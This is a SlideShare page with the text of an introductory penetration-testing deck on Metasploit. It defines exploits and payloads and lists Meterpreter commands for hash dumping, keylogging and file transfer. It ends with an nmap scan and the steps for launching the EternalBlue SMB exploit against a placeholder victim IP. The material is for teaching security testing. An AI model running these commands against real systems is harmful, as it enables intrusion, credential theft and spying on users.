SlideShare a Scribd company logo
2
Most read
11
Most read
14
Most read
Introduction To Exploitation & Metasploit
What is penetration testing ?
 It’s the process to identify security vulnerabilities in an
application by evaluating the system or network with
various malicious techniques.
 A penetration testing is a method of evaluating the
security of a computer system.
 Purpose of this test is to secure important data from
outsiders like hackers who can have unauthorized
access to system.
What is penetration testing ?
 Once vulnerability is identified it is used to exploit
system in order to gain access to sensitive information.
 Causes of vulnerabilities:
- Design and development errors
- Poor system configuration
- Human errors
Why conduct a penetration
testing?
 Government data must be secured while transferring
between different systems.
 Protecting your brand by avoiding loss of consumer
confidence and business reputation.
 To secure user data.
 To find security vulnerabilities in an application.
What can be tested ?
 Operating system, applications, database, networking
equipments etc.
 Dynamic websites, in-house applications etc.
 Telephony (war-dialing, remote access etc.)
 Personnel (screening process, social engineering etc.)
 Physical (access controls, dumpster diving etc.)
 Wireless (wifi, Bluetooth, IR, GSM, RFID etc.)
What is metasploit ?
 The Metasploit project is an open-source, computer
security project which provides information about
security vulnerabilities and aids in penetration testing
and IDS signature development.
 Metasploit is an framework which is used for the
hacking of different kinds of applications, operating
systems, web applications etc.
What is metasploit ?
 Metasploit contain various exploits, payloads, modules
etc.
 Metasploit Framework is especially used by many of
the hackers to generate payloads and attack the
systems.
 As Metasploit is an open source where any one can use
it. This framework supports different operating
systems like windows, linux ,mac os x etc.
Metasploit terms
 Exploit  used to take advantage of a security flaw
within a system, network, or application.
 Payload  is code that our victim computer to
execute by the Metasploit framework.
 Module  a small piece of code that can be added to
the Metasploit framework to execute an attack.
 Shell-code  a small piece of code used as a payload.
What is a vulnerability?
 A vulnerability is a security hole in a piece of software,
hardware or operating system that provides a potential
angle to attack the system.
 A vulnerability can be as simple as weak passwords or
as complex as buffer overflows or SQL injection
vulnerabilities.
What is an exploit?
 To take advantage of a vulnerability, you often need an
exploit, a small and highly specialized computer
program whose only reason of being is to take
advantage of a specific vulnerability and to provide
access to a computer system.
 Exploits often deliver a payload to the target system to
grant the attacker access to the system.
What is a payload?
 A payload is the piece of software that lets you control
a computer system after it’s been exploited.
 The payload is typically attached to and delivered by
the exploit.
 Metasploit most popular payload is called Meterpreter,
which enables you to do all sorts of funky stuff on the
target system. For example, you can upload and
download files from the system, take screenshots, and
collect password hashes etc.
What is msfconsole ?
 MSFconsole is an all-in-one interface to most of the
features in Metasploit.
 MSFconsole can be used to launch attacks, creating
listeners, and much, much more.
 Commands :
 Show exploits
 Show payloads
 Show options
 Use exploit
Commands
 set payload
 Set LHOST
 Set RHOST
 Back
 Info
 Session
 Session –l
 Session –i 1
Meterpreter commands
 Getuid -> show uid
 Ps -> show active process
 Migrate -> command used when hacker want to
migrate his process to any administrative privileges
process.
 Hashdump -> to dump password hash.
 Screenshot -> to take screenshot of victim.
 Shell -> to enter into the victim shell.
 download C:<file name>
 upload C:<file name>
More Meterpreter commands
 keyscan_start -> start sniffing key strokes.
 keyscan_dump
 keyscan_stop
 uictl disable keyboard
 uictl enable keyboard
Demonstration - Service Exploitation
Reconnaissance
 Ports and service scan of target system
>> nmap -sS -p445 -sV -v <victim_IP>
Exploitation – ms17_010_eternalblue
>> msfconsole
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 > show options
msf5 > set RHOST <victim_IP>
Exploitation – ms17_010_eternalblue
Exploitation – ms17_010_eternalblue
Introduction To Exploitation & Metasploit

More Related Content

PPTX
Metasploit framework in Network Security
PPTX
Metasploit framwork
PPTX
Introduction to Metasploit
 
PPTX
Metasploit
PDF
Metaploit
PPTX
Metasploit
PPTX
Ethical Hacking - sniffing
Metasploit framework in Network Security
Metasploit framwork
Introduction to Metasploit
 
Metasploit
Metaploit
Metasploit
Ethical Hacking - sniffing

What's hot (20)

PPTX
Metasploit (Module-1) - Getting Started With Metasploit
PDF
Threat-Based Adversary Emulation with MITRE ATT&CK
PPTX
Footprinting and reconnaissance
PPTX
System hacking
 
PDF
Nmap tutorial
PPTX
Introduction to penetration testing
PPTX
Finalppt metasploit
PPTX
PPTX
Threat hunting for Beginners
PDF
Nmap basics
PDF
Vulnerability Management
PPTX
Zen map
PPTX
Understanding NMAP
PDF
Threat Hunting
PPTX
Nmap and metasploitable
PDF
Ethical Hacking Tools
PDF
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
PPTX
Leveraging MITRE ATT&CK - Speaking the Common Language
PPTX
Brute force-attack presentation
PPTX
Ethical hacking : Its methodologies and tools
Metasploit (Module-1) - Getting Started With Metasploit
Threat-Based Adversary Emulation with MITRE ATT&CK
Footprinting and reconnaissance
System hacking
 
Nmap tutorial
Introduction to penetration testing
Finalppt metasploit
Threat hunting for Beginners
Nmap basics
Vulnerability Management
Zen map
Understanding NMAP
Threat Hunting
Nmap and metasploitable
Ethical Hacking Tools
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
Leveraging MITRE ATT&CK - Speaking the Common Language
Brute force-attack presentation
Ethical hacking : Its methodologies and tools
Ad

Similar to Introduction To Exploitation & Metasploit (20)

PPTX
Pentesting with linux
PPTX
Metasploit
PPTX
Introduction to metasploit
 
PDF
Metasploit Computer security testing tool
PDF
Exploits Attack on Windows Vulnerabilities
PDF
Pen-Testing with Metasploit
PPTX
Introduction To Ethical Hacking
PDF
24 33 -_metasploit
PDF
Metasploitation part-1 (murtuja)
PDF
01_Metasploit - The Elixir of Network Security
PDF
01 Metasploit kung fu introduction
PDF
Pentest with Metasploit
PDF
Open Source Cyber Weaponry
PPTX
Metasploit Framework and Payloads supported
PDF
iCrOSS 2013_Pentest
PPTX
BSides Algiers - Metasploit framework - Oussama Elhamer
PPTX
Metaploit
PDF
SSMF (Security Scope Metasploit Framework) - Course Syllabus
PPTX
metaploit framework
PPTX
Metasploit
Pentesting with linux
Metasploit
Introduction to metasploit
 
Metasploit Computer security testing tool
Exploits Attack on Windows Vulnerabilities
Pen-Testing with Metasploit
Introduction To Ethical Hacking
24 33 -_metasploit
Metasploitation part-1 (murtuja)
01_Metasploit - The Elixir of Network Security
01 Metasploit kung fu introduction
Pentest with Metasploit
Open Source Cyber Weaponry
Metasploit Framework and Payloads supported
iCrOSS 2013_Pentest
BSides Algiers - Metasploit framework - Oussama Elhamer
Metaploit
SSMF (Security Scope Metasploit Framework) - Course Syllabus
metaploit framework
Metasploit
Ad

More from Raghav Bisht (19)

PPTX
OSINT - Yandex Search
PPTX
OSINT - Twitter Searches
PPTX
OSINT Tool - Reconnaissance with Recon-ng
PPTX
OSINT Tool - Reconnaissance with Maltego
PPTX
OSINT - Linkedin Search Slides
PPTX
OSINT - Facebook Searches
PPTX
Osint - Dark side of Internet
PDF
Intrusion Detection System Project Report
DOCX
Ethical Hacking (CEH) - Industrial Training Report
PPTX
Sql injection attack
PPTX
Os Command Injection Attack
PPTX
Introduction To Vulnerability Assessment & Penetration Testing
PPTX
Directory Traversal & File Inclusion Attacks
DOCX
Antivirus Bypass Techniques - 2016
PDF
ccna practical notes
PDF
Hacking in shadows By - Raghav Bisht
DOCX
Web-servers & Application Hacking
PPTX
Introduction To Hacking
PDF
Windows Registry Tips & Tricks
OSINT - Yandex Search
OSINT - Twitter Searches
OSINT Tool - Reconnaissance with Recon-ng
OSINT Tool - Reconnaissance with Maltego
OSINT - Linkedin Search Slides
OSINT - Facebook Searches
Osint - Dark side of Internet
Intrusion Detection System Project Report
Ethical Hacking (CEH) - Industrial Training Report
Sql injection attack
Os Command Injection Attack
Introduction To Vulnerability Assessment & Penetration Testing
Directory Traversal & File Inclusion Attacks
Antivirus Bypass Techniques - 2016
ccna practical notes
Hacking in shadows By - Raghav Bisht
Web-servers & Application Hacking
Introduction To Hacking
Windows Registry Tips & Tricks

Recently uploaded (20)

PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
A comparative analysis of optical character recognition models for extracting...
PPTX
Machine Learning_overview_presentation.pptx
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
PPTX
Programs and apps: productivity, graphics, security and other tools
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
PDF
Assigned Numbers - 2025 - Bluetooth® Document
PDF
Spectral efficient network and resource selection model in 5G networks
PPTX
MYSQL Presentation for SQL database connectivity
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PDF
NewMind AI Weekly Chronicles - August'25-Week II
PDF
Empathic Computing: Creating Shared Understanding
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
Encapsulation_ Review paper, used for researhc scholars
A comparative analysis of optical character recognition models for extracting...
Machine Learning_overview_presentation.pptx
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
Dropbox Q2 2025 Financial Results & Investor Presentation
Programs and apps: productivity, graphics, security and other tools
Per capita expenditure prediction using model stacking based on satellite ima...
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
Assigned Numbers - 2025 - Bluetooth® Document
Spectral efficient network and resource selection model in 5G networks
MYSQL Presentation for SQL database connectivity
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
NewMind AI Weekly Chronicles - August'25-Week II
Empathic Computing: Creating Shared Understanding
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Digital-Transformation-Roadmap-for-Companies.pptx
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Mobile App Security Testing_ A Comprehensive Guide.pdf
Building Integrated photovoltaic BIPV_UPV.pdf
Advanced methodologies resolving dimensionality complications for autism neur...

Introduction To Exploitation & Metasploit

  • 2. What is penetration testing ?  It’s the process to identify security vulnerabilities in an application by evaluating the system or network with various malicious techniques.  A penetration testing is a method of evaluating the security of a computer system.  Purpose of this test is to secure important data from outsiders like hackers who can have unauthorized access to system.
  • 3. What is penetration testing ?  Once vulnerability is identified it is used to exploit system in order to gain access to sensitive information.  Causes of vulnerabilities: - Design and development errors - Poor system configuration - Human errors
  • 4. Why conduct a penetration testing?  Government data must be secured while transferring between different systems.  Protecting your brand by avoiding loss of consumer confidence and business reputation.  To secure user data.  To find security vulnerabilities in an application.
  • 5. What can be tested ?  Operating system, applications, database, networking equipments etc.  Dynamic websites, in-house applications etc.  Telephony (war-dialing, remote access etc.)  Personnel (screening process, social engineering etc.)  Physical (access controls, dumpster diving etc.)  Wireless (wifi, Bluetooth, IR, GSM, RFID etc.)
  • 6. What is metasploit ?  The Metasploit project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.  Metasploit is an framework which is used for the hacking of different kinds of applications, operating systems, web applications etc.
  • 7. What is metasploit ?  Metasploit contain various exploits, payloads, modules etc.  Metasploit Framework is especially used by many of the hackers to generate payloads and attack the systems.  As Metasploit is an open source where any one can use it. This framework supports different operating systems like windows, linux ,mac os x etc.
  • 8. Metasploit terms  Exploit  used to take advantage of a security flaw within a system, network, or application.  Payload  is code that our victim computer to execute by the Metasploit framework.  Module  a small piece of code that can be added to the Metasploit framework to execute an attack.  Shell-code  a small piece of code used as a payload.
  • 9. What is a vulnerability?  A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system.  A vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.
  • 10. What is an exploit?  To take advantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system.  Exploits often deliver a payload to the target system to grant the attacker access to the system.
  • 11. What is a payload?  A payload is the piece of software that lets you control a computer system after it’s been exploited.  The payload is typically attached to and delivered by the exploit.  Metasploit most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes etc.
  • 12. What is msfconsole ?  MSFconsole is an all-in-one interface to most of the features in Metasploit.  MSFconsole can be used to launch attacks, creating listeners, and much, much more.  Commands :  Show exploits  Show payloads  Show options  Use exploit
  • 13. Commands  set payload  Set LHOST  Set RHOST  Back  Info  Session  Session –l  Session –i 1
  • 14. Meterpreter commands  Getuid -> show uid  Ps -> show active process  Migrate -> command used when hacker want to migrate his process to any administrative privileges process.  Hashdump -> to dump password hash.  Screenshot -> to take screenshot of victim.  Shell -> to enter into the victim shell.  download C:<file name>  upload C:<file name>
  • 15. More Meterpreter commands  keyscan_start -> start sniffing key strokes.  keyscan_dump  keyscan_stop  uictl disable keyboard  uictl enable keyboard
  • 16. Demonstration - Service Exploitation
  • 17. Reconnaissance  Ports and service scan of target system >> nmap -sS -p445 -sV -v <victim_IP>
  • 18. Exploitation – ms17_010_eternalblue >> msfconsole msf5 > use exploit/windows/smb/ms17_010_eternalblue
  • 19. msf5 > show options msf5 > set RHOST <victim_IP> Exploitation – ms17_010_eternalblue